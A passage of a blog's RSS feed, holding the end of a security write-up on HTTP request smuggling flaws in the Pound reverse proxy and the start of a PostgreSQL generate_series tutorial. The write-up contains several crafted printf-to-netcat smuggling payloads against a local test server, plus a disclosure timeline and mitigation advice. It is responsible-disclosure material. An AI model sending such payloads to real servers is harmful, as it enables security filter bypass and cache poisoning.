&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host:localhost\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Dummy:Header\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;GET /tests HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host:localhost\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Dummy:Header\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;|&lt;/span&gt; nc -q3 127.0.0.1 8080&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;On each attack we 2 responses instead of 3, you can also make 3 responses instead of 2.&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot; data-lang=&quot;bash&quot;&gt;&lt;span class=&quot;c&quot;&gt;# 3 responses instead of 2 (2nd query is unmasked by pound)&lt;/span&gt;
&lt;span class=&quot;nb&quot;&gt;printf&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;GET / HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host:localhost\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Transfer-\0Mode: magic\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Encoding: chunked\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Content-length: 57\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Dummy:Header\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;0\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;GET /tmp/ HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host:localhost\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Dummy:Header\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;GET /tests HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host:localhost\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Dummy:Header\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;|&lt;/span&gt; nc -q3 127.0.0.1 8080&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;And if you are still here you can compare the last two examples.
On the first one we try a bad chunked transmission, and on the last one we use the &lt;code&gt;ops-fold&lt;/code&gt; syntax.
Use wireshark to compare the behaviors and some potential &lt;em&gt;crafted headers&lt;/em&gt; syntax transmitted to backends.&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot; data-lang=&quot;bash&quot;&gt;&lt;span class=&quot;c&quot;&gt;# chunk mode not applied&lt;/span&gt;
&lt;span class=&quot;nb&quot;&gt;printf&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;GET / HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host:localhost\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Transfer-\0Mode: magic\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Encoding: chunked,zorg\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Content-length: 57\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Dummy:Header\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;0\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;GET /tmp/ HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host:localhost\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Dummy:Header\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;GET /tests HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host:localhost\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Dummy:Header\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;|&lt;/span&gt; nc -q3 127.0.0.1 8080&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;




&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot; data-lang=&quot;bash&quot;&gt;&lt;span class=&quot;c&quot;&gt;# chunk mode applied, and &amp;#39;\r\n zorg\r\n&amp;#39; ops-fold transmitted&lt;/span&gt;
&lt;span class=&quot;nb&quot;&gt;printf&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;GET / HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host:localhost\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Transfer-\0Mode: magic\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Encoding: chunked\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39; zorg\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Content-length: 57\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Dummy:Header\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;0\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;GET /tmp/ HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host:localhost\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Dummy:Header\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;GET /tests HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host:localhost\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Dummy:Header\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;|&lt;/span&gt; nc -q3 127.0.0.1 8080&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h3&gt;5) Transmission issues&lt;/h3&gt;

&lt;p&gt;This strange ops-fold syntax transmitted could be a problem. This was removed in version 2.8.
Usually the Reverse proxy which support ops-fold are not transmitting the syntax (everything back on one line).&lt;/p&gt;

&lt;p&gt;They were other transmission issues like this one (sadly not fixed):&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot; data-lang=&quot;bash&quot;&gt;&lt;span class=&quot;nb&quot;&gt;printf&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;GET / HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host:localhost\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Transfer-Encoding: chunked\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Dummy:Header\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;0000000000000000000000000000042\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;GET /tmp/ HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host:localhost\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Transfer-Encoding: chunked\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;0\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;|&lt;/span&gt; nc -q3 127.0.0.1 8080&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;This is not an invalid query. The first chunk size is &lt;code&gt;42&lt;/code&gt; in hexa, so 66 bytes.
The second chunk is the end-of-chunks marker, the last 2 lines &lt;code&gt;0\r\n\r\n&lt;/code&gt;.
The &lt;code&gt;GET /tmp/&lt;/code&gt; query does not exists, it&#39;s just some uninterpreted bytes in the first chunk body of 66 bytes.&lt;/p&gt;

&lt;p&gt;But if you use wireshark you will detect that this message is transfered as-is,
the &lt;code&gt;0000000000000000000000000000042&lt;/code&gt; is not rewitten as &lt;code&gt;42&lt;/code&gt; or &lt;code&gt;042&lt;/code&gt;.
That&#39;s still officially not an issue. The problem is that this syntax is sometimes
an issue for some backends (chunk size attribute truncation issues) where
you may read this &lt;code&gt;0000000000000000000000000000042&lt;/code&gt; as &lt;code&gt;00000000000000000&lt;/code&gt; and wrongly detect it
as an end-of-chunks marker. And then discover the (false) &lt;code&gt;GET /tmp/&lt;/code&gt; query.&lt;/p&gt;

&lt;p&gt;Of course the security issue here is on the backend, not Pound. But &lt;strike&gt;shi&lt;/strike&gt;things happens.&lt;/p&gt;

&lt;p&gt;Some other transmissions issues were fixed, like these strange syntax:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;GET /url?foo=[SOMETHING]HTTP/0.9 HTTP/1.1\r\n
or
GET /url?foo=[SOMETHING]Host:example.com, HTTP/1.1\r\n
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;with [SOMETHING] = BACKSPACE or CR or BEL or FORMFEED or HTAB or VTAB.&lt;/p&gt;

&lt;h2&gt;Severity&lt;/h2&gt;

&lt;p&gt;Bad HTTP syntax parsing is a security issue, the main problem is that any bad
HTTP actor in a network of HTTP actors becomes the hammer and previous actors
becomes nails.&lt;/p&gt;

&lt;p&gt;The actor which suffers from Request splitting is the one which wrongly read a garbage body and extract a query from it.
No other preceding actor could filter this query before because it was just a body (security filter bypass).
And No one is expecting this query response (cache poisoning, etc.).&lt;/p&gt;

&lt;p&gt;That&#39;s why the RFC has some minimal requirements on syntax parsing around message size.&lt;/p&gt;

&lt;p&gt;On most installations Pound will be the SSL terminator, usually the &lt;strong&gt;first server side actor&lt;/strong&gt; in the chain.&lt;/p&gt;

&lt;p&gt;In this position the request splitting attacks are hard to exploit, maybe it could be used to poison a Forward proxy on client side, maybe.
But it cannot be used to attack the backends.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;_____________________________              _________________________________
|      Client Side          |              |     Server Side               |
Browser ---&amp;gt; Forward proxy ------Internet---&amp;gt; Pound ---&amp;gt; Varnish ---&amp;gt; Nginx
                    NAIL? &amp;lt;================== HAMMER?
                                              NAIL? &amp;lt;==== HAMMER?
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Maybe some other HTTPS load balancers are present in front of Pound, on some big installations,
that would be more dangerous as Pound could be used to send some extra responses to these proxys (WAFs?).&lt;/p&gt;

&lt;p&gt;But on this position the most effective issues, on an attacker point of view,
are transmission issues, where bad crafted headers are transmitted to backends by Pound. Because &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2016-2086&quot;&gt;on&lt;/a&gt; &lt;a href=&quot;http://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00123.html&quot;&gt;the&lt;/a&gt; &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2016-6816&quot;&gt;backends&lt;/a&gt; &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2016-8743&quot;&gt;you&lt;/a&gt; &lt;a href=&quot;https://trac.nginx.org/nginx/ticket/762&quot;&gt;could&lt;/a&gt; &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2015-8852&quot;&gt;have&lt;/a&gt; &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2015-3183&quot;&gt;some&lt;/a&gt; &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2015-5739&quot;&gt;issues&lt;/a&gt; &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2015-5740&quot;&gt;and&lt;/a&gt; it&#39;s always a bad idea to send bad queries to backends.&lt;/p&gt;

&lt;p&gt;If you look at the two main errors, Double Content Length and no respect of chunked priority, it is more dangerous on a backend than on a front.
This, in my mind, reduces the impact of exploitations of these issues. I may be wrong. But transmissions issues,
which are more dangerous for the ecosystem, are usually not even considered as security issues,
because the Proxy is not doing any splitting, just forwarding some dangerous syntax.&lt;/p&gt;

&lt;h2&gt;I use Pound, what can I do?&lt;/h2&gt;

&lt;p&gt;First of all you can use Pound 2.8. Or a 2.7.x with the patchs.&lt;/p&gt;

&lt;p&gt;If the fixed package is not available on your distribution you can &lt;strong&gt;easily&lt;/strong&gt; compile Pound 2.8. I made several compilations of Pound on jessie and stretch docker environements without any complexity (configure/make/make install).&lt;/p&gt;

&lt;p&gt;Then you can also follow the Debian team and check for more active alternatives. &lt;a href=&quot;http://www.haproxy.org/&quot;&gt;Haproxy&lt;/a&gt; for example.&lt;/p&gt;

&lt;h2&gt;Timeline&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;2016-09-05: reports to project maintainers&lt;/li&gt;
&lt;li&gt;2016-09-08: some more reports&lt;/li&gt;
&lt;li&gt;2016-10-23: version 2.8a (experimental) &lt;a href=&quot;http://www.apsis.ch/pound/pound_list/archive/2016/2016-10/1477235279000&quot;&gt;published&lt;/a&gt;, with all the fixs, &lt;em&gt;request smuggling&lt;/em&gt; is used in the announce, not the word &lt;em&gt;security&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;2018-01-15: asking project maintainer for CVE. Yes, quite late, I&#39;m not always working on this subject :-)&lt;/li&gt;
&lt;li&gt;2018-01-29: CVE Id reserved by me and transfered to the vendor&lt;/li&gt;
&lt;li&gt;2018-02-13: pound fixed On &lt;a href=&quot;https://lists.debian.org/debian-lts-announce/2018/02/msg00015.html&quot;&gt;debian7 Wheezy (old)&lt;/a&gt;, patch proposed &lt;a href=&quot;https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=888786&quot;&gt;for jessie and stretch&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;2018-02-24: pound removed from Debian unstable&lt;/li&gt;
&lt;li&gt;2018-05-11: Pound &lt;a href=&quot;http://www.apsis.ch/pound/pound_list/archive/2018/2018-05/1526034164000#1526034164000&quot;&gt;2.8 released&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;2018-07-03: this page&lt;/li&gt;
&lt;/ul&gt;


&lt;h2&gt;See also&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Video &lt;a href=&quot;https://www.youtube.com/watch?v=dVU9i5PsMPY&quot;&gt;Defcon HTTP Smuggling&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20presentations/DEFCON-24-Regilero-Hiding-Wookiees-In-Http.pdf&quot;&gt;Defcon support&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Video &lt;a href=&quot;https://www.youtube.com/watch?v=lY_Mf2Fv7kI&quot;&gt;Defcon demos&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
				<published>2018-07-03 00:00:00 +0200</published>
				<link>http://regilero.github.io/english/security/2018/07/03/security_pound_http_smuggling/</link>
			</item>
		
			<item>
				<title>PostgreSQL, advanced use of generate_series for data generation</title>
				<description>&lt;p&gt;&lt;small&gt;&lt;strong&gt;English version&lt;/strong&gt; (&lt;strong&gt;Version Française&lt;/strong&gt; disponible sur &lt;a href=&quot;http://www.makina-corpus.com/blog/metier/2017/postgresql-utilisations-avancees-de-generate_series-pour-generer-du-contenu&quot;&gt;makina corpus&lt;/a&gt;).&lt;/small&gt;
&lt;small&gt;estimated read time: 10-15min&lt;/small&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Generating massive amounts of data can be useful to test queries, indexes and
complex treatments on more realistics volumes, to get useful approximations of
production response times.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;In this article we&#39;ll study some &lt;code&gt;generate_series()&lt;/code&gt; usages allowing us to feed all types of tables.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The starting point is that we have two tables to feed (&lt;code&gt;contact&lt;/code&gt; and &lt;code&gt;company&lt;/code&gt;), with some constraints on these tables:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;a &lt;strong&gt;foreign key&lt;/strong&gt; contraint, linking a &lt;code&gt;contact&lt;/code&gt; to one &lt;code&gt;company&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;some constraints on column &lt;strong&gt;sizes&lt;/strong&gt; (like for last name and first name)&lt;/li&gt;
&lt;li&gt;some specific constraints (CHECK) on &lt;strong&gt;dates&lt;/strong&gt; (like a &lt;code&gt;contact&lt;/code&gt; has some first and last interactions dates,
and these dates have some constraints between each other, and cannot be in the future, etc.)&lt;/li&gt;
&lt;/ul&gt;


&lt;p&gt;The other point is that we need to work on several tens of thousands of rows.
For example to apply a functionnal process that need to be applied in production later and control the speed
of this process. Or simply to test that our indexation plan is right.&lt;/p&gt;

&lt;p&gt;Some tools exists, able to generate content. In the Django world, for example,
you could use &lt;a href=&quot;https://factoryboy.readthedocs.io/en/latest/&quot;&gt;Factory Boy&lt;/a&gt;, or &lt;a href=&quot;https://djangopackages.org/grids/g/fixtures/&quot;&gt;others&lt;/a&gt;. But here we&#39;ll show how to generate this same type of data in a quite &lt;em&gt;simple&lt;/em&gt; manne,
&lt;strong&gt;using SQL&lt;/strong&gt; directly, in a very very fast way (fast enough to be added in a
functionnal test setUp).&lt;/p&gt;

&lt;p&gt;We first need a realistic model. With a &lt;code&gt;company&lt;/code&gt; table, a &lt;code&gt;contact&lt;/code&gt; table, some
index, and two or three lines of examples.&lt;/p&gt;

&lt;p&gt;You can download &lt;a href=&quot;https://github.com/regilero/regilero.github.com/blob/master/theme/resource/pgserie/basic_schema.sql&quot;&gt;an example basic_schema.sql script&lt;/a&gt; containing all these elements (&lt;a href=&quot;http://regilero.github.io/theme/resource/pgserie/basic_schema.sql&quot;&gt;direct download&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;And we can also use &lt;strong&gt;SQLFiddle&lt;/strong&gt; to &lt;a href=&quot;http://sqlfiddle.com/#!17/25d75/1&quot;&gt;visualize this structure online&lt;/a&gt;. But my
advice is to create a test database and to run this SQL inside, it will be easier
to test the complex queries in your own database.&lt;/p&gt;

&lt;h2&gt;Simple data generation&lt;/h2&gt;

&lt;p&gt;Let&#39;s use &lt;code&gt;generate_series&lt;/code&gt; to generate some data :&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-sql&quot; data-lang=&quot;sql&quot;&gt;&lt;span class=&quot;c1&quot;&gt;-- tall numbers between 1 and 100 (step 1 by default)&lt;/span&gt;
&lt;span class=&quot;k&quot;&gt;SELECT&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;generate_series&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;100&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
&lt;span class=&quot;c1&quot;&gt;-- all dates between 2010/05/10 and now,&lt;/span&gt;
&lt;span class=&quot;c1&quot;&gt;-- with a step of 78 days, 15 hours and 10 minutes&lt;/span&gt;
&lt;span class=&quot;k&quot;&gt;SELECT&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;*&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;FROM&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;generate_series&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&amp;#39;2010-10-05 00:00&amp;#39;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;::&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;timestamp&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;
                              &lt;span class=&quot;k&quot;&gt;CURRENT_TIMESTAMP&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;
                              &lt;span class=&quot;s1&quot;&gt;&amp;#39;8 days 15 hours 12min&amp;#39;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;As we can see this function is quite powerful (&lt;a href=&quot;http://sqlfiddle.com/#!17/9eecb/191&quot;&gt;SQLFidlle1&lt;/a&gt; &lt;a href=&quot;http://sqlfiddle.com/#!17/9eecb/190&quot;&gt;SQLFidlle2&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;But our goal is to push this usage &lt;strong&gt;further&lt;/strong&gt;.&lt;/p&gt;

&lt;h2&gt;Generating names from syllables&lt;/h2&gt;

&lt;p&gt;Let&#39;s start with &lt;a href=&quot;https://github.com/regilero/regilero.github.com/blob/master/theme/resource/pgserie/feeding_company.sql&quot;&gt;this query&lt;/a&gt; which generates a lot of company names, we&#39;ll use that to feed the &lt;code&gt;company&lt;/code&gt; table:&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-sql&quot; data-lang=&quot;sql&quot;&gt;&lt;span class=&quot;k&quot;&gt;SELECT&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;SELECT&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;concat_ws&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&amp;#39; &amp;#39;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;name_first&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;name_last&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;as&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;generated&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;FROM&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;
